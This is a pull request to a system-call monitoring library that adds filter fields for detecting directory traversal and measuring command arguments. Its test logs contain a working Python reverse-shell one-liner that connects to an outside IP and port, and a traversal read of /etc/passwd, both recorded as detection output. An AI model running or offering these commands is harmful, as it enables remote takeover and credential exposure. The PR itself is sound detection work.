### PR TITLE
new(userspace/libsinsp): extend filter/display fields

### DIFF
--- a/userspace/libsinsp/fdinfo.cpp
+++ b/userspace/libsinsp/fdinfo.cpp
@@ -135,6 +135,11 @@ template<> string sinsp_fdinfo_t::tostring_clean()
 	return m_tstr;
 }
 
+template<> void sinsp_fdinfo_t::add_filename_raw(const char* rawpath)
+{
+	m_name_raw = rawpath;
+}
+
 template<> void sinsp_fdinfo_t::add_filename(const char* fullpath)
 {
 	m_name = fullpath;

--- a/userspace/libsinsp/fdinfo.h
+++ b/userspace/libsinsp/fdinfo.h
@@ -113,6 +113,7 @@ public:
 		m_openflags = other.m_openflags;	
 		m_sockinfo = other.m_sockinfo;
 		m_name = other.m_name;
+		m_name_raw = other.m_name_raw;
 		m_oldname = other.m_oldname;
 		m_flags = other.m_flags;
 		m_dev = other.m_dev;
@@ -342,6 +343,7 @@ public:
 	sinsp_sockinfo m_sockinfo = {};
 
 	std::string m_name; ///< Human readable rendering of this FD. For files, this is the full file name. For sockets, this is the tuple. And so on.
+	std::string m_name_raw; // Human readable rendering of this FD. See m_name, only used if fd is a file path. Path is kept "raw" with limited sanitization and without absolute path derivation.
 	std::string m_oldname; // The name of this fd at the beginning of event parsing. Used to detect name changes that result from parsing an event.
 
 	inline bool has_decoder_callbacks()
@@ -381,6 +383,7 @@ private:
 		FLAGS_CONNECTION_FAILED = (1 << 16),
 	};
 
+	void add_filename_raw(const char* rawpath);
 	void add_filename(const char* fullpath);
 
 public:

--- a/userspace/libsinsp/filterchecks.cpp
+++ b/userspace/libsinsp/filterchecks.cpp
@@ -298,7 +298,7 @@ uint8_t* sinsp_filter_check_fd::extract_from_null_fd(sinsp_evt *evt, OUT uint32_
 	{
 	case TYPE_FDNAME:
 	{
-		if(extract_fdname_from_creator(evt, len, sanitize_strings, false) == true)
+		if(extract_fdname_from_creator(evt, len, sanitize_strings) == true)
 		{
 			RETURN_EXTRACT_STRING(m_tstr);
 		}
@@ -309,7 +309,7 @@ uint8_t* sinsp_filter_check_fd::extract_from_null_fd(sinsp_evt *evt, OUT uint32_
 	}
 	case TYPE_CONTAINERNAME:
 	{
-		if(extract_fdname_from_creator(evt, len, sanitize_strings, false) == true)
+		if(extract_fdname_from_creator(evt, len, sanitize_strings) == true)
 		{
 			m_tstr = m_tinfo->m_container_id + ':' + m_tstr;
 			RETURN_EXTRACT_STRING(m_tstr);
@@ -322,7 +322,7 @@ uint8_t* sinsp_filter_check_fd::extract_from_null_fd(sinsp_evt *evt, OUT uint32_
 	case TYPE_DIRECTORY:
 	case TYPE_CONTAINERDIRECTORY:
 	{
-		if(extract_fdname_from_creator(evt, len, sanitize_strings, false) == true)
+		if(extract_fdname_from_creator(evt, len, sanitize_strings) == true)
 		{
 			if(sanitize_strings)
 			{
@@ -363,7 +363,7 @@ uint8_t* sinsp_filter_check_fd::extract_from_null_fd(sinsp_evt *evt, OUT uint32_
 			return NULL;
 		}
 
-		if(extract_fdname_from_creator(evt, len, sanitize_strings, false) == true)
+		if(extract_fdname_from_creator(evt, len, sanitize_strings) == true)
 		{
 			if(sanitize_strings)
 			{

--- a/userspace/libsinsp/filterchecks.h
+++ b/userspace/libsinsp/filterchecks.h
@@ -264,6 +264,7 @@ public:
 		TYPE_DEV_MAJOR = 39,
 		TYPE_DEV_MINOR = 40,
 		TYPE_INO = 41,
+		TYPE_FDNAMERAW = 42,
 	};
 
 	enum fd_type
@@ -300,7 +301,7 @@ public:
 
 private:
 	uint8_t* extract_from_null_fd(sinsp_evt *evt, OUT uint32_t* len, bool sanitize_strings);
-	bool extract_fdname_from_creator(sinsp_evt *evt, OUT uint32_t* len, bool sanitize_strings);
+	bool extract_fdname_from_creator(sinsp_evt *evt, OUT uint32_t* len, bool sanitize_strings, bool fd_nameraw);
 	bool extract_fd(sinsp_evt *evt);
 };
 
@@ -365,6 +366,9 @@ public:
 		TYPE_CAP_PERMITTED = 50,
 		TYPE_CAP_INHERITABLE = 51,
 		TYPE_CAP_EFFECTIVE = 52,
+		TYPE_CMDNARGS = 53,
+		TYPE_CMDLENARGS = 54,
+		TYPE_PVPID = 55,
 	};
 
 	sinsp_filter_check_thread();

--- a/userspace/libsinsp/filterchecks.h
+++ b/userspace/libsinsp/filterchecks.h
@@ -301,7 +301,7 @@ public:
 
 private:
 	uint8_t* extract_from_null_fd(sinsp_evt *evt, OUT uint32_t* len, bool sanitize_strings);
-	bool extract_fdname_from_creator(sinsp_evt *evt, OUT uint32_t* len, bool sanitize_strings, bool fd_nameraw);
+	bool extract_fdname_from_creator(sinsp_evt *evt, OUT uint32_t* len, bool sanitize_strings, bool fd_nameraw = false);
 	bool extract_fd(sinsp_evt *evt);
 };
 

--- a/userspace/libsinsp/parsers.cpp
+++ b/userspace/libsinsp/parsers.cpp
@@ -2412,6 +2412,7 @@ void sinsp_parser::parse_open_openat_creat_exit(sinsp_evt *evt)
 		fdi.m_mount_id = 0;
 		fdi.m_dev = dev;
 		fdi.m_ino = ino;
+		fdi.add_filename_raw(name);
 		fdi.add_filename(fullpath);
 
 		//

--- a/userspace/libsinsp/utils.h
+++ b/userspace/libsinsp/utils.h
@@ -186,24 +186,27 @@ inline void sanitize_string(std::string &str)
 
 inline void remove_duplicate_path_separators(std::string &str)
 {
-	// Light fd name sanitization if fd is a file - only remove consecutive duplicate separators
-	char prev_char;
-	char separator = '/';
-	for (auto cur_char_it = str.begin(); cur_char_it != str.end(); cur_char_it++)
-	{
-		if (prev_char == *cur_char_it)
-		{
-			if (prev_char == separator)
-			{
-				str.erase(cur_char_it);
-				cur_char_it--;
-			}
-		}
-		else
-		{
-			prev_char = *cur_char_it;
-		}
-	}
+    // Light fd name sanitization if fd is a file - only remove consecutive duplicate separators
+    if(str.size() < 2)
+    {
+        // There is nothing to do if there are 0 or 1 chars in the string, protecting dereference operations
+        return;
+    }
+
+    char prev_char = *str.begin();
+
+    for (auto cur_char_it = str.begin() + 1; cur_char_it != str.end();)
+    {
+        if (prev_char == *cur_char_it && prev_char == '/')
+        {
+            cur_char_it = str.erase(cur_char_it);
+        }
+        else
+        {
+            prev_char = *cur_char_it;
+            cur_char_it++;
+        }
+    }
 }
 
 ///////////////////////////////////////////////////////////////////////////////

--- a/userspace/libsinsp/utils.h
+++ b/userspace/libsinsp/utils.h
@@ -184,6 +184,28 @@ inline void sanitize_string(std::string &str)
 	str.erase(remove_if(str.begin(), str.end(), g_invalidchar()), str.end());
 }
 
+inline void remove_duplicate_path_separators(std::string &str)
+{
+	// Light fd name sanitization if fd is a file - only remove consecutive duplicate separators
+	char prev_char;
+	char separator = '/';
+	for (auto cur_char_it = str.begin(); cur_char_it != str.end(); cur_char_it++)
+	{
+		if (prev_char == *cur_char_it)
+		{
+			if (prev_char == separator)
+			{
+				str.erase(cur_char_it);
+				cur_char_it--;
+			}
+		}
+		else
+		{
+			prev_char = *cur_char_it;
+		}
+	}
+}
+
 ///////////////////////////////////////////////////////////////////////////////
 // Time utility functions.
 ///////////////////////////////////////////////////////////////////////////////


### PR DESCRIPTION
Signed-off-by: Melissa Kilby <melissa.kilby.oss@gmail.com>

**What type of PR is this?**

/kind feature

**Any specific area of the project related to this PR?**

/area libsinsp


**What this PR does / why we need it**:

Add new filter / display fields 

```
fd.nameraw
proc.cmdnargs
proc.cmdlenargs
proc.pvpid
```

Why are new fields needed:

- `fd.nameraw` - Enables detections of Arbitrary File Reads using Directory Traversal Technique as file path is not normalized (e.g. `fd.name` like `/etc/passwd` vs `fd.nameraw` like `../../../../../.././etc/passwd`). However, for robustness duplicate `/` separators are removed as the OS ignores them when interpreting file paths.
- `proc.cmdnargs` - Number of cmd args - useful for behavioral / statistical filtering of cmds.
- `proc.cmdlenargs` - Length of all cmd args combined excluding whitespaces - useful for behavioral / statistical filtering of cmds.
- `proc.pvpid` - While here also added option to filter or output vpid of the parent process.



**Which issue(s) this PR fixes**:


**Special notes for your reviewer**:

Added new `m_name_raw` to not interfere in any way with existing flow of deriving `fd.name`.

Test logs with new outputs:

```
{"priority":"Warning","rule":"Directory traversal etc passwd read","source":"syscall","time":"2022-07-08T21:26:58.961751770Z", "output_fields": {"container.id":"host","container.image.repository":null,"evt.res":"SUCCESS","evt.time":1657315618961751770,"fd.name":"/etc/passwd","fd.nameraw":"/.././../././etc/passwd","proc.aname[2]":"sshd","proc.cmdlenargs":33,"proc.cmdline":"cat /../////./..////.////./etc/passwd","proc.cmdnargs":1,"proc.exepath":"/usr/bin/cat","proc.name":"cat","proc.pid":2925,"proc.pname":"bash","proc.ppid":2237,"proc.pvpid":2237,"proc.vpid":2925,"user.loginuid":1000,"user.name":"vagrant"}}
{"priority":"Warning","rule":"all connect test","source":"syscall","time":"2022-07-08T21:29:03.522571816Z", "output_fields": {"evt.type":"connect","fd.name":"10.211.55.157:52546->192.168.56.37:1337","fd.nameraw":"","fd.sockfamily":"ip","fd.type":"ipv4","proc.aname[2]":"sshd","proc.aname[3]":"sshd","proc.cmdlenargs":270,"proc.cmdline":"python -c socket=__import__(\"socket\");subprocess=__import__(\"subprocess\");os=__import__(\"os\");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.56.37\",1337));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])","proc.cmdnargs":2,"proc.cwd":"/home/vagrant/","proc.duration":1989782605,"proc.exepath":"/usr/bin/python","proc.loginshellid":2237,"proc.name":"python","proc.pid":2934,"proc.pname":"bash","proc.ppid":2237,"proc.sid":2237,"proc.sname":"bash","proc.tty":34817,"proc.vpgid":2934,"proc.vpid":2934,"user.loginuid":1000,"user.name":"vagrant","user.uid":1000}}
```


**Does this PR introduce a user-facing change?**:

```release-note
new: extend filter/display fields
```
